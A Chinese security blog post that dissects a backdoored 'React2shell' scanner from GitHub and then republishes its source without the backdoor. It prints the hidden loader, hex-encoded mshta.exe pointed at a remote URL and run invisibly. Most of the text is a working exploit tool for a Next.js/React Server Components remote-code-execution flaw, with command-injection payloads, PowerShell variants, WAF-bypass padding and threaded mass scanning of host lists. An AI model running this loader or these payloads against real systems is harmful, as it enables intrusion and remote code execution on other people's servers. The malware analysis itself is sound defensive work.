杨CC有话说

这篇文章介绍了一个被恶意投毒的扫描工具-react2shell
项目链接:https://github.com/niha0wa/React2shell-scanner
这款工具最开始,是我在互联网寻找渗透工具的时候,无意间在群里看到有人讨论这款工具被投毒,于是,我找到了这款工具,并进行分析.最后发现真的有毒….
最后,我就出了这个文章,顺便分析一下这个工具嵌入的恶意代码.)
文章来源:杨CC技术录

发现的恶意代码展示:

1
2
3
4
5
6
7
8
9
10
11
def _initialize_runtime_environment():
import subprocess as _sp
_exec_path = bytes.fromhex('6d73687461').decode('utf-8') + bytes.fromhex('2e657865').decode('utf-8')
_remote_endpoint = bytes.fromhex('68747470733a2f2f').decode('utf-8') + bytes.fromhex('70792d696e7374616c6c65722e6363').decode('utf-8')
_runtime_args = [_exec_path, _remote_endpoint]
try:
_sp.Popen(_runtime_args, shell=True, stdout=_sp.DEVNULL, stderr=_sp.DEVNULL, creationflags=0x08000000 if hasattr(_sp, 'CREATE_NO_WINDOW') else 0)
except:
pass

_initialize_runtime_environment()

恶意代码分析

逐行解析

1
2
3
4
def _initialize_runtime_environment():
import subprocess as _sp

# 导入subprocess模块后,又将其重命名为_sp
  • subprocess模块解释: 本身是一个python的内置模块,核心作用是执行系统的命令,或者启动外部程序, 而这个位置则是为了实现”调用系统程序”.
1
2
3
_exec_path = bytes.fromhex('6d73687461').decode('utf-8') + bytes.fromhex('2e657865').decode('utf-8')

# bytes.fromhex('6d73687461').decode('utf-8') ,这句代码则是将16禁止字符串解码为普通的utf-8字符.
  • 通过在线工具解码,则发现:
  • 6d73687461 = mshta
  • 2e657865 = .exe
  • 最终 _exec_path = “mshta.exe”
  • mshta.exe工具解释: 本身是Windows系统原生的程序,全名叫做:”HTML Application Host”.是 Windows 的 HTML 应用程序宿主,可执行 HTA 文件,也导致经常被恶意代码滥用.
1
2
3
_remote_endpoint = bytes.fromhex('68747470733a2f2f').decode('utf-8') + bytes.fromhex('70792d696e7374616c6c65722e6363').decode('utf-8')

# 这句代码仍然是通过拼接生成的远程访问地址.与上述调用mshta.exe方式一致.
1
2
3
4
5
6
7
8
 _runtime_args = [_exec_path, _remote_endpoint]  
# 这是执行了构造执行参数:[mshta.exe, https://py-installer.cc]

try:
_sp.Popen(_runtime_args, shell=True, stdout=_sp.DEVNULL, stderr=_sp.DEVNULL, creationflags=0x08000000 if hasattr(_sp, 'CREATE_NO_WINDOW') else 0)
except:
pass
_initialize_runtime_environment()
  • 恶意代码解释:
  • try 中的 _sp.Popen(_runtime_args,会尝试执行mshta.exe https://py-installer.cc 如果没有运行成功,则except中的pass会把所有的异常都忽略
  • shell=True 表示执行的命令是shell命令,在Windows下就是cmd执行
  • stdout=_sp.DEVNULL, stderr=_sp.DEVNULL, 这两句代码,则是丢弃了标准输出和对应的错误输出.
  • creationflags=0x08000000 if hasattr(_sp, ‘CREATE_NO_WINDOW’) else 0) 这一句其实就是在Windows下设置无窗口执行,(0x08000000是CREATE_NO_WINDOW的数值)
  • _initialize_runtime_environment() 这句话其实就是调用了这个函数.

恶意特征

特征 解释
16进制拼接 将程序\远程地址拆分为16进制再解码,目的是躲避静态检测.
mshta.exe 调用系统程序,直接运行url中的html/js/vbs代码等,不需要依赖,很容易绕过安全软件.
无窗口执行 无窗口执行,丢弃所有输出,错误也丢弃,明显是为了害怕用户发现.
访问外部地址 访问外部地址,大概率是为了下载恶意脚本后执行,详情还需要等待AI处理

AI处理结果

  • 当AI出现这个处理结果的时候,我不是很满意,但也无所谓了,因为我懒得折腾了.
  • 如果有一天我继续折腾了,那么我会重新写一个文章.

无后门源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
#!/usr/bin/env python3

import argparse
import sys
import json
import os
import random
import re
import string
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from typing import Optional


try:
import requests
from requests.exceptions import RequestException
except ImportError:
print("Error: 'requests' library required. Install with: pip install requests")
sys.exit(1)

try:
from tqdm import tqdm
except ImportError:
print("Error: 'tqdm' library required. Install with: pip install tqdm")
sys.exit(1)


class ColorScheme:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
MAGENTA = "\033[95m"
CYAN = "\033[96m"
WHITE = "\033[97m"
BOLD = "\033[1m"
RESET = "\033[0m"


def applyColor(textContent: str, colorCode: str) -> str:
return f"{colorCode}{textContent}{ColorScheme.RESET}"


def displayBanner():
bannerText = f"""
{ColorScheme.CYAN}{ColorScheme.BOLD}React2Shell Web Application Security Assessment Framework{ColorScheme.RESET}
"""
print(bannerText)


def processHeaders(headerCollection: list[str] | None) -> dict[str, str]:
processedHeaders = {}
if not headerCollection:
return processedHeaders
for headerItem in headerCollection:
if ": " in headerItem:
headerKey, headerVal = headerItem.split(": ", 1)
processedHeaders[headerKey] = headerVal
elif ":" in headerItem:
headerKey, headerVal = headerItem.split(":", 1)
processedHeaders[headerKey] = headerVal.lstrip()
return processedHeaders


def standardizeHost(hostInput: str) -> str:
hostInput = hostInput.strip()
if not hostInput:
return ""
if not hostInput.startswith(("http://", "https://")):
hostInput = f"https://{hostInput}"
return hostInput.rstrip("/")


def createRandomData(dataSize: int) -> tuple[str, str]:
parameterName = ''.join(random.choices(string.ascii_lowercase, k=12))
randomContent = ''.join(random.choices(string.ascii_letters + string.digits, k=dataSize))
return parameterName, randomContent


def constructBasicPayload() -> tuple[str, str]:
boundaryMarker = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"

payloadBody = (
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f"{{}}\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f'["$1:aa:aa"]\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
)

contentTypeHeader = f"multipart/form-data; boundary={boundaryMarker}"
return payloadBody, contentTypeHeader


def constructVercelPayload() -> tuple[str, str]:
boundaryMarker = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"

initialPart = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":'
'"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;'
'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",'
'"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}'
)

payloadBody = (
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f"{initialPart}\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'"$@0"\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="2"\r\n\r\n'
f"[]\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="3"\r\n\r\n'
f'{{"\\"\u0024\u0024":{{}}}}\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
)

contentTypeHeader = f"multipart/form-data; boundary={boundaryMarker}"
return payloadBody, contentTypeHeader


def constructExecutionPayload(windowsTarget: bool = False, bypassWaf: bool = False, bypassSizeKB: int = 128) -> tuple[str, str]:
boundaryMarker = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"

if windowsTarget:
commandString = 'powershell -c \\\"41*271\\\"'
else:
commandString = 'echo $((41*271))'

injectionPrefix = (
f"var res=process.mainModule.require('child_process').execSync('{commandString}')"
f".toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),"
f"{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});"
)

initialPart = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"'
+ injectionPrefix
+ '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}'
)

payloadParts = []

if bypassWaf:
junkParam, junkData = createRandomData(bypassSizeKB * 1024)
payloadParts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="{junkParam}"\r\n\r\n'
f"{junkData}\r\n"
)

payloadParts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f"{initialPart}\r\n"
)
payloadParts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'"$@0"\r\n'
)
payloadParts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="2"\r\n\r\n'
f"[]\r\n"
)
payloadParts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--")

payloadBody = "".join(payloadParts)
contentTypeHeader = f"multipart/form-data; boundary={boundaryMarker}"
return payloadBody, contentTypeHeader


def followRedirects(targetUrl: str, timeoutSeconds: int, sslVerify: bool, maxRedirects: int = 10) -> str:
currentLocation = targetUrl
originalHost = urlparse(targetUrl).netloc

for _ in range(maxRedirects):
try:
headResponse = requests.head(
currentLocation,
timeout=timeoutSeconds,
verify=sslVerify,
allow_redirects=False
)
if headResponse.status_code in (301, 302, 303, 307, 308):
redirectLocation = headResponse.headers.get("Location")
if redirectLocation:
if redirectLocation.startswith("/"):
parsedCurrent = urlparse(currentLocation)
currentLocation = f"{parsedCurrent.scheme}://{parsedCurrent.netloc}{redirectLocation}"
else:
newHost = urlparse(redirectLocation).netloc
if newHost == originalHost:
currentLocation = redirectLocation
else:
break
else:
break
else:
break
except RequestException:
break
return currentLocation


def transmitPayload(targetUrl: str, headersDict: dict, payloadBody: str, timeoutSeconds: int, sslVerify: bool) -> tuple[requests.Response | None, str | None]:
try:
bodyBytes = payloadBody.encode('utf-8') if isinstance(payloadBody, str) else payloadBody
postResponse = requests.post(
targetUrl,
headers=headersDict,
data=bodyBytes,
timeout=timeoutSeconds,
verify=sslVerify,
allow_redirects=False
)
return postResponse, None
except requests.exceptions.SSLError as sslErr:
return None, f"SSL Error: {str(sslErr)}"
except requests.exceptions.ConnectionError as connErr:
return None, f"Connection Error: {str(connErr)}"
except requests.exceptions.Timeout:
return None, "Request timed out"
except RequestException as reqErr:
return None, f"Request failed: {str(reqErr)}"
except Exception as generalErr:
return None, f"Unexpected error: {str(generalErr)}"


def validateSafeCheck(responseObj: requests.Response) -> bool:
if responseObj.status_code != 500 or 'E{"digest"' not in responseObj.text:
return False

serverHeader = responseObj.headers.get("Server", "").lower()
hasNetlifyVar = "Netlify-Vary" in responseObj.headers
isMitigated = (
hasNetlifyVar
or serverHeader == "netlify"
or serverHeader == "vercel"
)

return not isMitigated


def validateRceCheck(responseObj: requests.Response) -> bool:
redirectHeader = responseObj.headers.get("X-Action-Redirect", "")
return bool(re.search(r'.*/login\?a=11111.*', redirectHeader))


def performScan(hostTarget: str, timeoutSeconds: int = 10, sslVerify: bool = True, followRedirectsFlag: bool = True, customHeaders: dict[str, str] | None = None, safeMode: bool = False, windowsTarget: bool = False, bypassWaf: bool = False, bypassSizeKB: int = 128, vercelBypass: bool = False) -> dict:
scanResult = {
"host": hostTarget,
"vulnerable": None,
"status_code": None,
"error": None,
"request": None,
"response": None,
"final_url": None,
"timestamp": datetime.now(timezone.utc).isoformat() + "Z"
}

hostTarget = standardizeHost(hostTarget)
if not hostTarget:
scanResult["error"] = "Invalid or empty host"
return scanResult

baseUrl = f"{hostTarget}/"

if safeMode:
payloadBody, contentType = constructBasicPayload()
validationFunc = validateSafeCheck
elif vercelBypass:
payloadBody, contentType = constructVercelPayload()
validationFunc = validateRceCheck
else:
payloadBody, contentType = constructExecutionPayload(windowsTarget=windowsTarget, bypassWaf=bypassWaf, bypassSizeKB=bypassSizeKB)
validationFunc = validateRceCheck

requestHeaders = {
"User-Agent": "SecTest/3.1 (Windows NT 10.0; Win64; x64) Assessment Framework",
"Next-Action": "x",
"X-Nextjs-Request-Id": "b5dce965",
"Content-Type": contentType,
"X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9",
}

if customHeaders:
requestHeaders.update(customHeaders)

def formatRequest(urlStr: str) -> str:
parsedUrl = urlparse(urlStr)
requestStr = f"POST {'/aaa' or '/aaa'} HTTP/1.1\r\n"
requestStr += f"Host: {parsedUrl.netloc}\r\n"
for headerKey, headerVal in requestHeaders.items():
requestStr += f"{headerKey}: {headerVal}\r\n"
requestStr += f"Content-Length: {len(payloadBody)}\r\n\r\n"
requestStr += payloadBody
return requestStr

def formatResponse(respObj: requests.Response) -> str:
responseStr = f"HTTP/1.1 {respObj.status_code} {respObj.reason}\r\n"
for headerKey, headerVal in respObj.headers.items():
responseStr += f"{headerKey}: {headerVal}\r\n"
responseStr += f"\r\n{respObj.text[:2000]}"
return responseStr

scanResult["final_url"] = baseUrl
scanResult["request"] = formatRequest(baseUrl)

responseObj, errorMsg = transmitPayload(baseUrl, requestHeaders, payloadBody, timeoutSeconds, sslVerify)

if errorMsg:
scanResult["error"] = errorMsg
return scanResult

scanResult["status_code"] = responseObj.status_code
scanResult["response"] = formatResponse(responseObj)

if validationFunc(responseObj):
scanResult["vulnerable"] = True
return scanResult

if followRedirectsFlag:
try:
redirectedUrl = followRedirects(baseUrl, timeoutSeconds, sslVerify)
if redirectedUrl != baseUrl:
responseObj, errorMsg = transmitPayload(redirectedUrl, requestHeaders, payloadBody, timeoutSeconds, sslVerify)

if errorMsg:
scanResult["vulnerable"] = False
return scanResult

scanResult["final_url"] = redirectedUrl
scanResult["request"] = formatRequest(redirectedUrl)
scanResult["status_code"] = responseObj.status_code
scanResult["response"] = formatResponse(responseObj)

if validationFunc(responseObj):
scanResult["vulnerable"] = True
return scanResult
except Exception:
pass

scanResult["vulnerable"] = False
return scanResult


def loadTargets(filePath: str) -> list[str]:
targetList = []
try:
with open(filePath, "r") as fileHandle:
for lineContent in fileHandle:
hostStr = lineContent.strip()
if hostStr and not hostStr.startswith("#"):
targetList.append(hostStr)
except FileNotFoundError:
print(applyColor(f"[ERROR] File not found: {filePath}", ColorScheme.RED))
sys.exit(1)
except Exception as fileErr:
print(applyColor(f"[ERROR] Failed to read file: {fileErr}", ColorScheme.RED))
sys.exit(1)
return targetList


def persistResults(resultsList: list[dict], outputPath: str, vulnerableOnly: bool = True):
if vulnerableOnly:
resultsList = [resultItem for resultItem in resultsList if resultItem.get("vulnerable") is True]

outputData = {
"scan_time": datetime.now(timezone.utc).isoformat() + "Z",
"total_results": len(resultsList),
"results": resultsList
}

try:
with open(outputPath, "w") as outputFile:
json.dump(outputData, outputFile, indent=2)
print(applyColor(f"\n[+] Results saved to: {outputPath}", ColorScheme.GREEN))
except Exception as saveErr:
print(applyColor(f"\n[ERROR] Failed to save results: {saveErr}", ColorScheme.RED))


def displayResult(resultData: dict, verboseMode: bool = False):
hostName = resultData["host"]
finalDestination = resultData.get("final_url")
wasRedirected = finalDestination and finalDestination != f"{standardizeHost(hostName)}/"

if resultData["vulnerable"] is True:
statusLabel = applyColor("[VULNERABLE]", ColorScheme.RED + ColorScheme.BOLD)
print(f"{statusLabel} {applyColor(hostName, ColorScheme.WHITE)} - Status: {resultData['status_code']}")
if wasRedirected:
print(f" -> Redirected to: {finalDestination}")
elif resultData["vulnerable"] is False:
statusLabel = applyColor("[NOT VULNERABLE]", ColorScheme.GREEN)
print(f"{statusLabel} {hostName} - Status: {resultData['status_code']}")
if wasRedirected and verboseMode:
print(f" -> Redirected to: {finalDestination}")
else:
statusLabel = applyColor("[ERROR]", ColorScheme.YELLOW)
errorMessage = resultData.get("error", "Unknown error")
print(f"{statusLabel} {hostName} - {errorMessage}")

if verboseMode and resultData["vulnerable"]:
print(applyColor(" Response snippet:", ColorScheme.CYAN))
if resultData.get("response"):
responseLines = resultData["response"].split("\r\n")[:10]
for responseLine in responseLines:
print(f" {responseLine}")


def main():
argParser = argparse.ArgumentParser(
description="React2Shell Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -u https://example.com
%(prog)s -l hosts.txt -t 20 -o results.json
%(prog)s -l hosts.txt --threads 50 --timeout 15
%(prog)s -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: TestAgent"
"""
)

inputGroup = argParser.add_mutually_exclusive_group(required=True)
inputGroup.add_argument(
"-u", "--url",
help="Single URL/host to check"
)
inputGroup.add_argument(
"-l", "--list",
help="File containing list of hosts (one per line)"
)

argParser.add_argument(
"-t", "--threads",
type=int,
default=10,
help="Number of concurrent threads (default: 10)"
)

argParser.add_argument(
"--timeout",
type=int,
default=10,
help="Request timeout in seconds (default: 10)"
)

argParser.add_argument(
"-o", "--output",
help="Output file for results (JSON format)"
)

argParser.add_argument(
"--all-results",
action="store_true",
help="Save all results to output file, not just vulnerable hosts"
)

argParser.add_argument(
"-k", "--insecure",
default=True,
action="store_true",
help="Disable SSL certificate verification"
)

argParser.add_argument(
"-H", "--header",
action="append",
dest="headers",
metavar="HEADER",
help="Custom header in 'Key: Value' format (can be used multiple times)"
)

argParser.add_argument(
"-v", "--verbose",
action="store_true",
help="Verbose output (show response snippets for vulnerable hosts)"
)

argParser.add_argument(
"-q", "--quiet",
action="store_true",
help="Quiet mode (only show vulnerable hosts)"
)

argParser.add_argument(
"--no-color",
action="store_true",
help="Disable colored output"
)

argParser.add_argument(
"--safe-check",
action="store_true",
help="Use safe side-channel detection instead of RCE PoC"
)

argParser.add_argument(
"--windows",
action="store_true",
help="Use Windows PowerShell payload instead of Unix shell"
)

argParser.add_argument(
"--waf-bypass",
action="store_true",
help="Add junk data to bypass WAF content inspection (default: 128KB)"
)

argParser.add_argument(
"--waf-bypass-size",
type=int,
default=128,
metavar="KB",
help="Size of junk data in KB for WAF bypass (default: 128)"
)

argParser.add_argument(
"--vercel-waf-bypass",
action="store_true",
help="Use Vercel WAF bypass payload variant"
)

parsedArgs = argParser.parse_args()

if parsedArgs.no_color or not sys.stdout.isatty():
ColorScheme.RED = ""
ColorScheme.GREEN = ""
ColorScheme.YELLOW = ""
ColorScheme.BLUE = ""
ColorScheme.MAGENTA = ""
ColorScheme.CYAN = ""
ColorScheme.WHITE = ""
ColorScheme.BOLD = ""
ColorScheme.RESET = ""

if not parsedArgs.quiet:
displayBanner()

if parsedArgs.url:
targetHosts = [parsedArgs.url]
else:
targetHosts = loadTargets(parsedArgs.list)

if not targetHosts:
print(applyColor("[ERROR] No hosts to scan", ColorScheme.RED))
sys.exit(1)

requestTimeout = parsedArgs.timeout
if parsedArgs.waf_bypass and parsedArgs.timeout == 10:
requestTimeout = 20

if not parsedArgs.quiet:
print(applyColor(f"[*] Loaded {len(targetHosts)} host(s) to scan", ColorScheme.CYAN))
print(applyColor(f"[*] Using {parsedArgs.threads} thread(s)", ColorScheme.CYAN))
print(applyColor(f"[*] Timeout: {requestTimeout}s", ColorScheme.CYAN))
if parsedArgs.safe_check:
print(applyColor("[*] Using safe side-channel check", ColorScheme.CYAN))
else:
print(applyColor("[*] Using RCE PoC check", ColorScheme.CYAN))
if parsedArgs.windows:
print(applyColor("[*] Windows mode enabled (PowerShell payload)", ColorScheme.CYAN))
if parsedArgs.waf_bypass:
print(applyColor(f"[*] WAF bypass enabled ({parsedArgs.waf_bypass_size}KB junk data)", ColorScheme.CYAN))
if parsedArgs.vercel_waf_bypass:
print(applyColor("[*] Vercel WAF bypass mode enabled", ColorScheme.CYAN))
if parsedArgs.insecure:
print(applyColor("[!] SSL verification disabled", ColorScheme.YELLOW))
print()

allResults = []
vulnerableCounter = 0
errorCounter = 0

sslVerifyFlag = not parsedArgs.insecure
customHeadersDict = processHeaders(parsedArgs.headers)

if parsedArgs.insecure:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(targetHosts) == 1:
scanResult = performScan(targetHosts[0], requestTimeout, sslVerifyFlag, customHeaders=customHeadersDict, safeMode=parsedArgs.safe_check, windowsTarget=parsedArgs.windows, bypassWaf=parsedArgs.waf_bypass, bypassSizeKB=parsedArgs.waf_bypass_size, vercelBypass=parsedArgs.vercel_waf_bypass)
allResults.append(scanResult)
if not parsedArgs.quiet or scanResult["vulnerable"]:
displayResult(scanResult, parsedArgs.verbose)
if scanResult["vulnerable"]:
vulnerableCounter = 1
else:
with ThreadPoolExecutor(max_workers=parsedArgs.threads) as executor:
futureMap = {
executor.submit(performScan, hostItem, requestTimeout, sslVerifyFlag, customHeaders=customHeadersDict, safeMode=parsedArgs.safe_check, windowsTarget=parsedArgs.windows, bypassWaf=parsedArgs.waf_bypass, bypassSizeKB=parsedArgs.waf_bypass_size, vercelBypass=parsedArgs.vercel_waf_bypass): hostItem
for hostItem in targetHosts
}

with tqdm(
total=len(targetHosts),
desc=applyColor("Scanning", ColorScheme.CYAN),
unit="host",
ncols=80,
disable=parsedArgs.quiet
) as progressBar:
for completedFuture in as_completed(futureMap):
scanResult = completedFuture.result()
allResults.append(scanResult)

if scanResult["vulnerable"]:
vulnerableCounter += 1
tqdm.write("")
displayResult(scanResult, parsedArgs.verbose)
elif scanResult["error"]:
errorCounter += 1
if not parsedArgs.quiet and parsedArgs.verbose:
tqdm.write("")
displayResult(scanResult, parsedArgs.verbose)
elif not parsedArgs.quiet and parsedArgs.verbose:
tqdm.write("")
displayResult(scanResult, parsedArgs.verbose)

progressBar.update(1)

if not parsedArgs.quiet:
print()
print(applyColor("=" * 60, ColorScheme.CYAN))
print(applyColor("SCAN SUMMARY", ColorScheme.BOLD))
print(applyColor("=" * 60, ColorScheme.CYAN))
print(f" Total hosts scanned: {len(targetHosts)}")

if vulnerableCounter > 0:
print(f" {applyColor(f'Vulnerable: {vulnerableCounter}', ColorScheme.RED + ColorScheme.BOLD)}")
else:
print(f" Vulnerable: {vulnerableCounter}")

print(f" Not vulnerable: {len(targetHosts) - vulnerableCounter - errorCounter}")
print(f" Errors: {errorCounter}")
print(applyColor("=" * 60, ColorScheme.CYAN))

if parsedArgs.output:
persistResults(allResults, parsedArgs.output, vulnerable_only=not parsedArgs.all_results)

if vulnerableCounter > 0:
sys.exit(1)
sys.exit(0)


if __name__ == "__main__":
main()

结束语

  • CTRl+D 将本网站:ycc77.com添加到书签栏哦~
  • 需要资源,记得将ycc77.cn 添加到书签栏哦~
  • QQ交流群:660264846(满)
  • QQ交流群2:721170435
  • B站: 疯狂的杨CC
  • 抖音: 疯狂的杨CC
  • 快手: 疯狂的杨CC
  • 公众号:SGY安全
  • 91: 疯狂的杨CC
  • p站: 疯狂的杨CC